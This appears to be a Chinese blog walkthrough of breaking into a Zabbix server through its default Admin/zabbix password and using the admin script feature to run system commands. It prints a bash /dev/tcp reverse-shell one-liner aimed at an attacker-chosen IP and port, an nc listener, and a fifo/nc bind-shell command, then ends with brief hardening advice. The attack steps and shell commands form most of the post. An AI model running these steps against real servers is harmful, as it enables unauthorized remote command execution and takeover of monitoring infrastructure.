zabbix弱口令进后台导致命令执行

  1. 遇到一个zabbix弱口令,这运气有点爆棚
Admin/zabbix   //话说这个zabbix可以爆破,还有的版本存在注入
  1. 进后台--管理--脚本


    1.jpg
  2. 右上角创建脚本


    2.jpg
  3. 添加上想执行的命令,确定
  4. 找到检测中--触发器--触发器状态选择任何--过滤


    3.jpg
  5. 选择刚才创建的脚本就可以执行命令了


    5.jpg
  6. 反弹shell
远程:bash -i >& /dev/tcp/自己的ip/自己的端口 0>&1
本地nc指令:nc -v -l -p 自己的端口

8.或者

zabbix脚本:cat /tmp/tmp_fifo | /bin/bash -i 2>&1 | nc -l 2222 > /tmp/tmp_fifo
#上面的意思是打开一个shell,监听2222端口。
#下面我们在自己的机器上,用nc命令连接到server的shell
nc ip 2222
  1. 修复漏洞
    1、很重要的一点,zabbix的登录口令一定要复杂,不要用默认口令或弱口令。
    2、zabbix的server和agent都不要以root启动,不要设置AllowRoot=1。
    3、禁止agent执行system.run,不要设置EnableRemoteCommands=1。
    4、经常打安全补丁,如果系统内核版本过低有漏洞的话,即使在zabbix用户下照样能获取root权限。

推荐阅读更多精彩内容

  • Zabbix简介 Zabbix官方网站Zabbix中文文档 本文系统环境是CentOS7x86_64, Zabbi...
    Zhang21阅读 5,815评论 0 37
  • 一、架构设计及环境规划: 架构设计图: 架构设计说明: 1. 基础架构为LAMP环境,采用keepalived实现...
    赏金Micheal阅读 6,989评论 0 6
  • 1.写在前面 本文主要介绍的是zabbix的编译安装过程,包含它的基础环境LNMP,虽然zabbix官方一般推荐的...
    天之蓝色阅读 1,837评论 0 16
  • 热油锅爆蒜末、姜末,加入紫菜洗水后装清水入锅煮开,加入打碎匀的鸡蛋,调入盐和鸡精,关火,盛入装有葱花的盆里
    渡把阅读 35评论 0 0
  • 「五亿探长雷洛传1:雷老虎」讲述的是上世纪五六十年代,由刘德华饰演的香港警察雷洛由一个无名小辈变为一代枭雄的故事。...
    晓云韶唠电影阅读 649评论 0 0